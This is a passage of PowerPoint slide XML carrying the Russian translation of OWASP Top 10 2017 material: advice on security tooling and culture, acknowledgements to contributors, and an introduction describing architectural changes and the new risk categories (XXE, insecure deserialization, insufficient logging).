                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t> защиты OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, а </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Стандарт подтверждения безопасности приложений OWASP (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> станет хорошим руководством для проверяющих организации и приложения по выбору параметров, подлежащих контролю.</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Используйте инструменты грамотно</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Уязвимости могут быть комплексными и скрываться глубоко в коде. В большинстве случаев наиболее эффективным подходом к поиску и устранению недостатков в безопасности является привлечение экспертов, вооруженных продвинутыми инструментами. Но не рекомендуется полагаться исключительно на инструменты, поскольку это дает ложное ощущение безопасности.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Развивайтесь во всех направлениях</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Сосредоточьтесь на том, чтобы сделать безопасность неотъемлемой частью вашей культуры разработки. Дополнительную информацию можно получить, ознакомившись с </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Моделью обеспечения безопасности ПО (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="780" dirty="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508027230"/>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Источники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Мы благодарны организациям, которые предоставили информацию об уязвимостях для выпуска обновления 2017. На призыв о сборе данных мы получили более 40 откликов. Впервые все данные, собранные для выпуска Топ-10, а также полный список участников проекта доступен публично. Мы полагаем, что это одна из самых больших и разносторонних баз данных по уязвимостям, которая когда-либо собиралась публично.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Поскольку участников проекта намного больше, чем доступного здесь места, мы создали </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>специальную страницу</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> с указанием внесенного ими вклада. Мы искренне благодарим организации за их решение оказаться на передовой и поделиться своими данными с сообществом. Надеемся, что подобная практика будет продолжаться и все больше организаций будет в этом участвовать; возможно, это станет одним из ключевых этапов в реализации безопасности на основе фактических данных. Создание Топ-10 OWASP было бы невозможным без участия всех этих удивительных людей.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Также мы хотим поблагодарить более 500 участников проекта, которые потратили свое время на завершение данного исследования. Мнения этих людей помогли выделить две новые категории для Топ-10. Мы ценим все комментарии, высказывания и критические отзывы, а также потраченное время и хотим выразить вам нашу благодарность.</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Хотим поблагодарить участников, которые оставляли свои конструктивные замечания и тратили время на рецензирование нового выпуска Топ-10. На сколько это возможно, мы перечислили их на странице ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Благодарности</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>’. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">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И наконец, хотим заранее поблагодарить всех переводчиков, которые будут переводить данный выпуск Топ-10 на различные языки, помогая тем самым сделать Топ-10 OWASP более доступным.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В</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Введение</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61905081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sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Что изменилось в 2017 году по сравнению с 2013-м?</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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Многое изменилось за последние четыре года, поэтому Топ-10 OWASP также требовались изменения. Мы полностью реорганизовали Топ-10, обновили методологию, применили новый процесс сбора данных, наладили взаимодействие с сообществом, пересмотрели уровни критичности, переписали все угрозы с нуля и добавили ссылки на наиболее распространенные </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фреймворки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и языки. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>За последние годы основные технологии и архитектура приложений сильно изменились:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Микросервисы</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, написанные на node.js и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spring</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Boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, заменяют традиционные монолитные приложения. С приходом </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>микросервисов</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> прибавилось проблем с безопасностью, таких как установление доверия между </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>микросервисами</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, контейнерами, управление критичными данными и т. п. Код, к которому раньше не предполагалось обращение через интернет, теперь располагается за API или веб-сервисами </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RESTful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и может быть использован одностраничными и мобильными приложениями. Архитектурные допущения в коде, касающиеся, например, доверенных вызывающих функций, более не актуальны.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Одностраничные приложения, разработанные с использованием </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript-фреймворков</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (таких как </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angular</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), позволяют создавать многофункциональные, модульные интерфейсы. Функциональные возможности клиентов, которые традиционно обеспечивались на стороне сервера, также добавляют проблем с безопасностью.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> в настоящее время является основным языком в сети</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>интернет, node.js работает на стороне сервера, а современные веб-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фреймворки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (такие как </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bootstrap</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Electron</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Angular</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) запускаются в клиентах. </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Новые угрозы, выделенные на основе данных:</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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-Внешние сущности XML (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1"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smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>— новая категория, выделенная на основе данных, полученных при помощи </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>инструментов тестирования безопасности исходного кода</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </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Новые угрозы, выделенные сообществом:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Мы попросили сообщество рассмотреть две перспективные категории угроз. Получив более 500 рецензий и исключив уже выделенные угрозы (такие как "Разглашение конфиденциальных данных" и "Внешние сущности XML"), были выбраны следующие категории: </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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, которая позволяет удаленно выполнить код или осуществить действия с критичными объектами.</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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>журналирования</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> и мониторинга</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, которые могут помешать обнаружению вредоносных действий или взломов, реагированию на инциденты, а также расследованию </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>киберпреступлений</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
